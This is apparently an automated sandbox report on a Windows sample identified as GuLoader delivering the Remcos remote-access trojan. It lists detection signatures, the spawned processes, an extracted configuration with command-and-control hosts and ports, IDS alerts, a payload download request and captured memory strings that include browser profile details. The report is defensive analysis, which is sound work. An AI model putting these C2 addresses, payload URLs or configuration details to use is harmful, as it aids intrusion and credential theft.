Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RC_S23_3274 Or_amento ADP 231019_5_5009.exe

Overview

General Information

Sample Name:RC_S23_3274 Or_amento ADP 231019_5_5009.exe
Analysis ID:1329385
MD5:aa9c44eda9af9222c5cab2466bc44f5a
SHA1:b5d7bcdf2637cee61c36d7a50d628288c3c5401e
SHA256:b58a548a509a5a2453800587352c8a7ff970dba696e82a69343738ef94073a8f
Infos:

Detection

GuLoader, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Yara detected Remcos RAT
Yara detected GuLoader
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to steal Mail credentials (via file registry)
Contains functionality to modify clipboard data
Yara detected WebBrowserPassView password recovery tool
C2 URLs / IPs found in malware configuration
Uses dynamic DNS services
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Sleep loop found (likely to delay execution)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
PE / OLE file has an invalid certificate
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • RC_S23_3274 Or_amento ADP 231019_5_5009.exe (PID: 4212 cmdline: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe MD5: AA9C44EDA9AF9222C5CAB2466BC44F5A)
    • wab.exe (PID: 4692 cmdline: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 5708 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ghwqzgqbog MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 6356 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ghwqzgqbog MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 5224 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\ijcjazbdkoecd MD5: 251E51E2FEDCE8BB82763D39D631EF89)
      • wab.exe (PID: 4344 cmdline: C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tehbtruwywwhnexk MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "ourt2949aslumes9.duckdns.org:2401:1ourt2949aslumes9.duckdns.org:2402:094.156.6.253:2402:094.156.6.253:2401:1", "Assigned name": "Crypted", "Copy file": "remcos.exe", "Mutex": "ourvbpld-RBN2WW", "Keylog file": "paqlgkfs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\paqlgkfs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000007.00000002.31180378733.0000000000A71000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000005.00000002.26296210823.00000000005B7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
        00000005.00000002.26296961645.0000000002CA8000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: RC_S23_3274 Or_amento ADP 231019_5_5009.exe PID: 4212JoeSecurity_GuLoader_3Yara detected GuLoaderJoe Security
            Process Memory Space: wab.exe PID: 4692JoeSecurity_WebBrowserPassViewYara detected WebBrowserPassView password recovery toolJoe Security
              Click to see the 2 entries
              No Sigma rule has matched
              Timestamp:192.168.11.2094.156.6.2535003124022032776 10/20/23-17:44:14.663509
              SID:2032776
              Source Port:50031
              Destination Port:2402
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:94.156.6.253192.168.11.202402500312032777 10/20/23-17:50:36.539605
              SID:2032777
              Source Port:2402
              Destination Port:50031
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.11.2077.238.121.25050030802855192 10/20/23-17:44:11.404566
              SID:2855192
              Source Port:50030
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 00000007.00000002.31180378733.0000000000A71000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "ourt2949aslumes9.duckdns.org:2401:1ourt2949aslumes9.duckdns.org:2402:094.156.6.253:2402:094.156.6.253:2401:1", "Assigned name": "Crypted", "Copy file": "remcos.exe", "Mutex": "ourvbpld-RBN2WW", "Keylog file": "paqlgkfs.dat", "Screenshot file": "Screenshots", "Audio folder": "MicRecords", "Copy folder": "Remcos"}
              Source: Yara matchFile source: 00000007.00000002.31180378733.0000000000A71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 4692, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\paqlgkfs.dat, type: DROPPED
              Source: RC_S23_3274 Or_amento ADP 231019_5_5009.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: RC_S23_3274 Or_amento ADP 231019_5_5009.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeCode function: 5_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405841
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeCode function: 5_2_00406393 FindFirstFileW,FindClose,5_2_00406393
              Source: C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exeCode function: 5_2_004027FB FindFirstFileW,5_2_004027FB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_33E110F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,7_2_33E110F1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 7_2_33E16580 FindFirstFileExA,7_2_33E16580
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_0040AE51 FindFirstFileW,FindNextFileW,10_2_0040AE51
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,11_2_00407C87
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,12_2_00407898

              Networking

              barindex
              Source: TrafficSnort IDS: 2855192 ETPRO TROJAN GuLoader Encoded Binary Request M2 192.168.11.20:50030 -> 77.238.121.250:80
              Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.11.20:50031 -> 94.156.6.253:2402
              Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 94.156.6.253:2402 -> 192.168.11.20:50031
              Source: Malware configuration extractorURLs: ourt2949aslumes9.duckdns.org
              Source: unknownDNS query: name: ourt2949aslumes9.duckdns.org
              Source: Joe Sandbox ViewASN Name: NET1-ASBG NET1-ASBG
              Source: Joe Sandbox ViewASN Name: ASIATECHIR ASIATECHIR
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 94.156.6.253 94.156.6.253
              Source: Joe Sandbox ViewIP Address: 77.238.121.250 77.238.121.250
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: global trafficHTTP traffic detected: GET /KvGfOfeyMpEaqpzI164.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Host: kapsnovin.comCache-Control: no-cache
              Source: global trafficTCP traffic: 192.168.11.20:50031 -> 94.156.6.253:2402
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: unknownTCP traffic detected without corresponding DNS query: 94.156.6.253
              Source: wab.exe, 0000000A.00000002.26374293276.00000000050A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}}fre{"autoimport_spartan_visible_item_completed":true,"oem_bookma!HC equals www.facebook.com (Facebook)
              Source: wab.exe, 00000007.00000002.31198333561.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000C.00000002.26338031304.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: wab.exe, 0000000A.00000003.26367250442.00000000030D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_o
              Source: wab.exe, 0000000A.00000003.26367250442.00000000030D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePrefixedEME","domain":"openidconnectweb.azurewebsites.net"}],"policies":[{"name":"ExposePrefixedEME","type":"PrefixedEme"}],"version":1},"media_foundation_o
              Source: wab.exe, wab.exe, 0000000C.00000002.26338031304.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: wab.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000A.00000003.26371827570.00000000030C4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26371488160.00000000030BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.26373910863.00000000030C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000A.00000003.26371827570.00000000030C4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26371488160.00000000030BC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.26373910863.00000000030C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: wab.exe, 0000000A.00000003.26368176623.00000000050A1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.26369099802.00000000050A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: n":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}}fre{"autoimport_spartan_visible_item_completed":true,"oem_bookma!HC equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000A.00000003.26367452341.00000000030C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: u"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}}fre{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"}hardware_acceleration_mode_previoustrueis_dsp_recommendedtruelegacy{"profile":{"name":{"migrated":true}}}migration{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false}network_primary_browser{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}}network_time{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}}os_crypt{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="}policy{"last_statistics_update":"13335737596278882"}profileANg3Zw2QouYXcOw3P8MgEYmqBohsyHX3A0QYKqCpqgaYKnCaImmJqgaoKr2eaJ8Qu6JvhC8IXgC8EXskfsUsie4Rd8IfhC8IXgC8EXgi8EXwi+EHxhm5eAX/CF4Gudt8rtxcmWHtzKEYrlqfPwGMw8n+fDLltVh7rgekAiRnsBdgY/P4Itiocfnljxe+W2ga1bwbr1j/CS/34+f3++b1IqgQeX2IdvZPSDce7EDIYgeJVNpXPeTKuHZ5yVD9wJ0DceUugUaQm3qtju0YTnB5MKDsADH+gwWG2vonWTUqaj9QFb2Dy/bF7sY6I1n2DJHmpa7A/qg4yb4S6NqPJ9AtKm/5KR8b3rp9+LtsdJcYYVbLtPZTteneEulyXk/54QMpAYEW3NtmiWweguM1wR+XqhTdqDDDBykftettEI9cW4grTMwqcc equals www.facebook.com (Facebook)
              Source: wab.exe, 0000000A.00000003.26367388067.00000000030D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}}fre{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"}hardware_acceleration_mode_previoustrueis_dsp_recommendedtruelegacy{"profile":{"name":{"migrated":true}}}migration{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false}network_primary_browser{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}}network_time{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}}os_crypt{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="}policy{"last_statistics_update":"13335737596278882"}profile{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20","background_apps":false,"edge_account_cid":"8628dc546dc99469","edge_account_first_name":"Shahak","edge_account_last_name":"Shapira","edge_account_oid":"","edge_account_sovereignty":0,"edge_account_tenant_id":"","edge_account_type":1,"edge_force_signout_state":0,"edge_kids_mode":false,"edge_muid":"243215E5327669D43677068133B66811","edge_previously_signin_user_name":"","edge_signed_in_default_name":33554433,"edge_test_on_premises":false,"edge_wam_aad_for_app_account_type":0,"edge_was_previously_signin":false,"force_signin_profile_locked":false,"gaia_given_name":"","gaia_id
              Source: wab.exe, 00000007.00000002.31198174813.0000000033D50000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.26372688257.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
